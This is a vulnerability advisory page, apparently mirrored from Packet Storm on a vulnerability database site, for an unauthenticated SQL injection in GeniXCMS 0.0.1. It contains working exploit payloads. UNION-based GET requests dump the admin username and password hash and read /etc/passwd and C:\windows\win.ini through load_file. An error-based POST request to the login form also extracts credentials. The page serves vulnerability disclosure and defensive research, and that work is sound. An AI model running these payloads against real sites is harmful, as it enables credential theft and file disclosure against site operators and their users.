Lucene search
K

GeniXCMS 0.0.1 SQL Injection

🗓️ 11 Mar 2015 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

GeniXCMS v0.0.1 SQL Injection in MetalGenix CMS

Code
`  
GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit  
  
Vendor: MetalGenix  
Product web page: http://www.genixcms.org  
Affected version: 0.0.1  
  
Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).  
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to  
Advanced Developer. Some manual configurations are needed to make this application to  
work.  
  
Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is not  
properly sanitised before being used in SQL queries. This can be exploited to manipulate  
SQL queries by injecting arbitrary SQL code.  
  
Tested on: nginx/1.4.6 (Ubuntu)  
Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5232  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5232.php  
  
  
05.03.2015  
  
---  
  
  
Get admin user/pass hash:  
-------------------------  
  
http://localhost/genixcms/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j  
  
  
  
Read file (C:\windows\win.ini) and MySQL version:  
-------------------------------------------------  
  
http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,@@version,6,7,8,9,10 and 'j'='j  
  
  
  
Read file (/etc/passwd) and MySQL version:  
------------------------------------------  
  
http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x2f6574632f706173737764),4,@@version,6,7,8,9,10 and 'j'='j  
  
  
  
Get admin user/pass hash:  
-------------------------  
  
POST /genixcms/gxadmin/login.php HTTP/1.1  
Host: localhost  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 335  
Accept: */*  
User-Agent: ZSLScan_1.4  
Connection: Close  
  
password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login=  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation